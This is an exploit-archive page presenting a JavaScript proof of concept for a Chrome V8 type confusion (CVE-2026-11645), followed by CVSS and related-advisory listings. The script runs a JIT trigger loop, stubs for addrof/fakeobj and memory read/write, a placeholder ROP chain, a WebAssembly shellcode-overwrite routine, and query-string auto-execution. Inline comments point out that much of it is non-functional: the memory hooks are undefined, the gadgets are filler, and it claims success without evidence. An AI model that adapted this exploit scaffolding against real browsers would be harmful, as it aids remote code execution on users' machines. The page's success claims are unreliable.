Google Chrome V8 Type Confusion

๐Ÿ—“๏ธย 16 Jun 2026ย 00:00:00Reported byย indoushkaTypeย 
packetstorm
ย packetstorm
packetstorm.news 41 Views

JavaScript exploit targets Chrome engine V8 type confusion and JIT flaw in versions before 149.0.7827.103.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Out-of-bounds Read in Google Chrome
10 Jun 2026 23:06
– githubexploit
GithubExploit
Exploit for Out-of-bounds Read in Google Chrome
10 Jun 2026 15:02
– githubexploit
ATTACKERKB
CVE-2026-11645
8 Jun 2026 23:27
– attackerkb
AlpineLinux
CVE-2026-11645
8 Jun 2026 23:27
– alpinelinux
Information Security Automation
June Linux Patch Wednesday
26 Jun 2026 17:00
– avleonov
BDU FSTEC
The vulnerability of the JavaScript script handler in Google Chrome's V8 engine allows attackers to execute arbitrary code.
10 Jun 2026 00:00
– bdu_fstec
Chainguard
CVE-2026-11645 vulnerabilities
10 Jun 2026 01:17
– cgr
Circl
CVE-2026-11645
8 Jun 2026 18:00
– circl
CISA KEV Catalog
Google Chromium V8 Out-of-Bounds Read and Write Vulnerability
9 Jun 2026 00:00
– cisa_kev
CISA
CISA Adds Three Known Exploited Vulnerabilities to Catalog
9 Jun 2026 12:00
– cisa
==================================================================================================================================
    | # Title     : Google Chrome V8 Type Confusion Exploit Payload met Memory Primitives                                            |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://chromereleases.googleblog.com                                                                            |
    ==================================================================================================================================
    
    [+] Summary    : This JavaScript exploit targets a type confusion vulnerability in the V8 engine of Google Chrome (versions prior to 149.0.7827.103). 
                     It runs inside the browser and attempts to trigger a JIT optimization flaw using repeated object construction patterns.
    
    [+] POC        :  
    
    
    
    (function() {
        'use strict';
    
        // Tunables for the harness below: loop counts plus one timer period.
        const CONFIG = {
            TRAINING_ITERATIONS: 800,    // constructions of C while the field initializer is the integer 2
            TRIGGER_ITERATIONS: 1500,    // constructions after the initializer is switched to 1.1
            STRONG_TRIGGER_COUNT: 5,     // how many times strongTrigger() repeats triggerTypeConfusion()
            STRESS_CYCLES: 8,            // number of exploit() calls scheduled by autoStressTest()
            STRESS_DELAY_MS: 700         // setInterval period (ms) between those calls
        };
    
        /**
         * Append a timestamped line to the #status element (falling back to
         * document.body) and echo the same line to the console.
         *
         * The line is inserted via textContent, so the message is never
         * interpreted as markup.
         *
         * @param {string} msg - text to record
         * @param {'info'|'success'|'warning'|'error'} [type='info'] - picks the
         *   text colour; any unknown value renders with the info colour
         */
        function log(msg, type = 'info') {
            const LEVEL_COLORS = {
                info: '#00ccff',
                success: '#00ff88',
                warning: '#ffaa00',
                error: '#ff4444'
            };
            const line = `[${new Date().toLocaleTimeString()}] ${msg}`;
            const target = document.getElementById('status') || document.body;

            if (target) {
                const entry = document.createElement('div');
                entry.style.color = LEVEL_COLORS[type] || LEVEL_COLORS.info;
                entry.textContent = line;
                target.appendChild(entry);
            }
            console.log(line);
        }
    
        /**
         * Runs the construction pattern the advisory header describes: a class
         * with a computed-key instance field whose initializer reads the closure
         * variable `value`, constructed repeatedly with an integer initializer
         * and then with a double.
         *
         * A true result only means both loops completed without an exception;
         * nothing in this function observes whether the engine actually
         * misbehaved, so "success" as reported by the caller is not evidence
         * of a vulnerable build.
         *
         * @returns {boolean} true if no exception was thrown, false otherwise
         *   (the error message is logged at error level)
         */
        function triggerTypeConfusion() {
            try {
                let value = 2;
                // The field initializer is evaluated on every construction, so
                // each instance sees whatever `value` holds at that moment.
                class C extends Function {
                    ['AA'] = value;
                }

                // Training phase: initializer is the integer 2.
                for (let i = 0; i < CONFIG.TRAINING_ITERATIONS; i++) {
                    new C("'use strict'");
                }
                value = 1.1;   // initializer now yields a double instead of an integer
                for (let i = 0; i < CONFIG.TRIGGER_ITERATIONS; i++) {
                    new C("'use strict'");
                }
                
                return true;
            } catch (e) {
                log(`Trigger error: ${e.message}`, 'error');
                return false;
            }
        }
        /**
         * Calls triggerTypeConfusion() CONFIG.STRONG_TRIGGER_COUNT times and
         * reports true if at least one call returned true. Because the callee
         * returns true whenever it does not throw, this almost always reports
         * success regardless of the browser under test.
         *
         * @returns {boolean} true if any run returned true
         */
        function strongTrigger() {
            let success = false;
            for (let i = 0; i < CONFIG.STRONG_TRIGGER_COUNT; i++) {
                log(`Strong trigger run ${i + 1}/${CONFIG.STRONG_TRIGGER_COUNT}...`);
                if (triggerTypeConfusion()) {
                    success = true;   // sticky: one non-throwing run is enough
                    log(`Trigger ${i + 1} successful`, 'success');
                }
            }
            return success;
        }
        /**
         * Delegates to an externally supplied window._addrof hook. Nothing in
         * this script defines that hook, so as shipped this always returns null.
         *
         * @param {*} obj - object to look up
         * @returns {*|null} whatever the hook returns, or null when no hook is installed
         */
        function addrof(obj) {
    
            if (typeof window._addrof === 'function') {
                return window._addrof(obj);
            }
            return null;
        }
    
        /**
         * Delegates to an externally supplied window._fakeobj hook; this script
         * never defines it, so the function returns null as shipped. It is also
         * not called anywhere in this file.
         *
         * @param {*} addr - value forwarded to the hook
         * @returns {*|null} hook result, or null when no hook is installed
         */
        function fakeobj(addr) {
            if (typeof window._fakeobj === 'function') {
                return window._fakeobj(addr);
            }
            return null;
        }
    
        /**
         * Delegates to an externally supplied window._read hook; not defined by
         * this script, so it returns null as shipped.
         *
         * @param {*} addr - forwarded to the hook
         * @param {*} size - forwarded to the hook
         * @returns {*|null} hook result, or null when no hook is installed
         */
        function readMemory(addr, size) {
            if (typeof window._read === 'function') {
                return window._read(addr, size);
            }
            return null;
        }
    
        /**
         * Delegates to an externally supplied window._write hook; not defined by
         * this script, so it returns false as shipped. Note the no-hook result is
         * false here but null in the sibling wrappers.
         *
         * @param {*} addr - forwarded to the hook
         * @param {*} data - forwarded to the hook
         * @returns {*|false} hook result, or false when no hook is installed
         */
        function writeMemory(addr, data) {
            if (typeof window._write === 'function') {
                return window._write(addr, data);
            }
            return false;
        }
    
        /**
         * Builds the primitives object used by exploit(). It only succeeds when
         * an external window.corruptBackingStore hook exists; this script does
         * not define one, so as shipped the function returns null and exploit()
         * stops at "Failed to setup memory primitives".
         *
         * @returns {{dataView: DataView, read: Function, write: Function}|null}
         *   read/write simply forward to readMemory/writeMemory
         */
        function setupPrimitives() {
            log("Setting up memory primitives...");
            
            try {
    
                const ab = new ArrayBuffer(0x1000);
                const dv = new DataView(ab);
                // The DataView is only ever handed to the external hook.
                if (typeof window.corruptBackingStore === 'function') {
                    window.corruptBackingStore(dv);
                    return {
                        dataView: dv,
                        read: (addr, size) => {
                            return readMemory(addr, size);
                        },
                        write: (addr, data) => {
                            return writeMemory(addr, data);
                        }
                    };
                }
            } catch (e) {
                log(`Failed to setup primitives: ${e}`, 'error');
            }
            
            return null;
        }
    
        /**
         * Derives a "base" value from addrof() of a throwaway object.
         *
         * With no addrof hook installed this returns null. Even with one, JS
         * bitwise operators work on 32-bit integers: `~0xFFFFFFFF` evaluates to
         * 0, so `base` is always 0 (falsy) and the caller logs
         * "Failed to find Chrome base".
         *
         * @returns {number|null} 0 when addrof() yields a truthy number, otherwise null
         */
        function findChromeBase() {
            const dummy = {};
            const addr = addrof(dummy);
            
            if (addr) {
                log(`Found object address: 0x${addr.toString(16)}`);
                const base = addr & ~0xFFFFFFFF;   // ~0xFFFFFFFF === 0 in 32-bit arithmetic
                log(`Chrome base candidate: 0x${base.toString(16)}`);
                return base;
            }
            
            return null;
        }
        /**
         * Packs a list of placeholder values into a byte array. The gadget
         * "addresses" are filler constants (0x4141..., 0x4242..., ...) rather
         * than anything resolved at runtime, and `virtual_protect` is defined
         * but never placed in the chain. Each chain element passes through
         * Uint32Array, which keeps only the low 32 bits of the value. This
         * function is not called anywhere in the script.
         *
         * @param {number} shellcodeAddr - inserted as the second chain element
         * @returns {Uint8Array} byte view over the Uint32Array buffer
         */
        function buildROPChain(shellcodeAddr) {
    
            const gadgets = {
                pop_rax: 0x414141414141,  
                pop_rcx: 0x424242424242,
                pop_rdx: 0x434343434343,
                pop_rsi: 0x444444444444,
                pop_rdi: 0x454545454545,
                syscall: 0x464646464646,
                virtual_protect: 0x474747474747   // unused below
            };
            
            const chain = [
                gadgets.pop_rax, 0x50, 
                gadgets.pop_rcx, shellcodeAddr,  
                gadgets.pop_rdx, 0x1000,  
                gadgets.pop_rsi, 0x40,  
                gadgets.pop_rdi, 0, 
                gadgets.syscall
            ];
            
            // Uint32Array element conversion truncates each value to 32 bits.
            return new Uint8Array(new Uint32Array(chain).buffer);
        }
        /**
         * Instantiates a tiny WebAssembly module and attempts to write over its
         * exported function via the writeMemory hook. Not called anywhere in
         * this script.
         *
         * The module bytes carry type (id 1), function (id 3) and code (id 10)
         * sections but no export section (id 7), so `exports.main` looks to be
         * undefined; without an addrof hook `funcAddr` is null and the function
         * falls through to return false. Whether the code section as encoded
         * even validates is not checked here — TODO confirm.
         *
         * @param {*} shellcode - forwarded to writeMemory
         * @returns {boolean} true only if the guarded branch runs to completion
         */
        function executeShellcode(shellcode) {
            log("Attempting to execute shellcode...");
            
            try {
                const wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,4,1,96,0,0,3,2,1,0,10,4,1,0,11]);
                const wasmModule = new WebAssembly.Module(wasmCode);
                const wasmInstance = new WebAssembly.Instance(wasmModule, {});
                const wasmFunc = wasmInstance.exports.main;   // no export section in wasmCode
                
                // Overwrite wasm function with shellcode
                const funcAddr = addrof(wasmFunc);
                if (funcAddr) {
                    writeMemory(funcAddr + 0x10, shellcode);
                    wasmFunc();
                    log("Shellcode executed!", "success");
                    return true;
                }
            } catch (e) {
                log(`Shellcode execution failed: ${e}`, 'error');
            }
            
            return false;
        }
        /**
         * Orchestrates one run: logs a UA-based version guess, runs
         * strongTrigger(), then setupPrimitives() and findChromeBase().
         *
         * The "vulnerable"/"patched" verdict is only a comparison of the
         * Chrome/NN user-agent token against 149 and is logged, not acted on.
         * As shipped the run ends at setupPrimitives() (no hook installed) and
         * returns false, so "Ready for payload execution" is never reached.
         * NOTE(review): the advisory header says "Tested on ... Mozilla firefox",
         * whose UA has no Chrome/NN token, so the version branch is skipped there.
         *
         * Declared async although nothing inside awaits; callers receive a
         * Promise<boolean>.
         *
         * @returns {Promise<boolean>} true only if every stage returned truthy
         */
        async function exploit() {
            log("Starting CVE-2026-11645 exploit...");
            log(`Target: Chrome < 149.0.7827.103`);
            const ua = navigator.userAgent;
            const chromeMatch = ua.match(/Chrome\/(\d+)/);
            if (chromeMatch) {
                const version = parseInt(chromeMatch[1]);   // no radix; digits-only capture so base 10 applies
                log(`Detected Chrome version: ${version}`);
                if (version >= 149) {
                    log("Browser appears patched", "warning");
                } else {
                    log("Browser appears vulnerable", "success");
                }
            }
            log("Triggering type confusion...");
            if (!strongTrigger()) {
                log("Failed to trigger type confusion", "error");
                return false;
            }
            log("Type confusion triggered successfully!", "success");
            const primitives = setupPrimitives();
            if (!primitives) {
                log("Failed to setup memory primitives", "error");
                return false;
            }
            log("Memory primitives ready", "success");
            const chromeBase = findChromeBase();
            // findChromeBase() returns 0 or null, both falsy, so this warning always fires.
            if (!chromeBase) {
                log("Failed to find Chrome base", "warning");
            }
            log("Ready for payload execution");
            
            return true;
        }
        /**
         * Schedules exploit() every CONFIG.STRESS_DELAY_MS ms for
         * CONFIG.STRESS_CYCLES cycles, then clears the timer.
         *
         * exploit() is async and its Promise is neither awaited nor given a
         * rejection handler, so cycles may overlap and any rejection would
         * surface as an unhandled rejection.
         *
         * @returns {number} the setInterval handle, so a caller can cancel early
         */
        function autoStressTest() {
            log(`Starting auto stress test (${CONFIG.STRESS_CYCLES} cycles)...`);
            
            let cycleCount = 0;
            const interval = setInterval(() => {
                cycleCount++;
                log(`Stress cycle ${cycleCount}/${CONFIG.STRESS_CYCLES}`);
                exploit();   // floating promise: not awaited
                
                if (cycleCount >= CONFIG.STRESS_CYCLES) {
                    clearInterval(interval);
                    log("Auto stress test completed");
                }
            }, CONFIG.STRESS_DELAY_MS);
            
            return interval;
        }
        // Expose the entry points on window for manual invocation from the console.
        window.CVE_2026_11645 = {
            exploit,
            autoStressTest,
            trigger: triggerTypeConfusion,
            strongTrigger
        };
        // Query-string dispatch. `includes` is a substring test, so any query
        // containing "auto=true" (e.g. "xauto=true") selects the first branch.
        if (window.location.search.includes('auto=true')) {
            setTimeout(() => autoStressTest(), 1000);
        } else if (window.location.search.includes('exploit=true')) {
            setTimeout(() => exploit(), 1000);   // returned promise is not handled
        } else {
            log("CVE-2026-11645 Exploit Ready", "success");
            log("Use ?auto=true for auto-stress or ?exploit=true for single exploit", "info");
        }
    })();
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

16 Jun 2026 00:00 Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.18.8
EPSS0.01654
SSVC
41